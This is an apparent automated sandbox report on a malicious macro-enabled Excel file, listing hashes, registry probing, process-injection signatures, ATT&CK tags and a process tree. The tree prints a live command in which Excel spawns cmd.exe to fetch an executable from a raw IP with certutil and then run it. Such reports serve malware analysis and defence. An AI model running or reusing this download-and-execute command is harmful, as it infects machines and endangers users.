a3a05d6c9cf4f4f8093c5991a60ef9a54511e30dff102a3f47ba73e375f00dde

Analysis

max time kernel
102s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2022, 16:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

MT-07610135.xlsm
Size

363KB
MD5

7ebdf90e9c2b2dc740b5a930aaae9c55
SHA1

1387b0f912d54f9528665dba4889daac9abae2e8
SHA256

dcbcdca874fa56a439e396a29375b40b3d5774029ad62a841878d9783bf01143
SHA512

9f1617bbe2dcda9fb5677a002777f5c192edc1e6caa9b26b61a53df72c894ff562f3321fae9bb8349382e44ebd4ba1fe3ecc323538970d7966301dda8351df46
SSDEEP

6144:Qw+RqiI9rPYvKW88hNdgZKoJzHN0/5DC5GHvvxU99oCnlAyPPyuUTuc9r33Yad:QfI9rgy583oJzeOcHvG99oep3B6uc9Tr

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4284	1868	cmd.exe	80

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1868	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE
1868	EXCEL.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1868 wrote to memory of 4284	1868	EXCEL.EXE	83
PID 1868 wrote to memory of 4284	1868	EXCEL.EXE	83
PID 4284 wrote to memory of 2860	4284	cmd.exe	85
PID 4284 wrote to memory of 2860	4284	cmd.exe	85

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MT-07610135.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1868
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c certutil.exe -urlcache -split -f "http://54.249.210.44/xi/loader/uploads/MT-07610135.exe" Fagzhypsfqyfoobdopiqn.exe.exe && Fagzhypsfqyfoobdopiqn.exe.exe
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Windows\system32\certutil.exe
    certutil.exe -urlcache -split -f "http://54.249.210.44/xi/loader/uploads/MT-07610135.exe" Fagzhypsfqyfoobdopiqn.exe.exe
    3⤵
    PID:2860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1868-138-0x00007FFB99260000-0x00007FFB99270000-memory.dmp

Filesize
64KB

Download
memory/1868-133-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-134-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-135-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-136-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-137-0x00007FFB99260000-0x00007FFB99270000-memory.dmp

Filesize
64KB

Download
memory/1868-132-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-142-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-143-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-144-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download
memory/1868-145-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads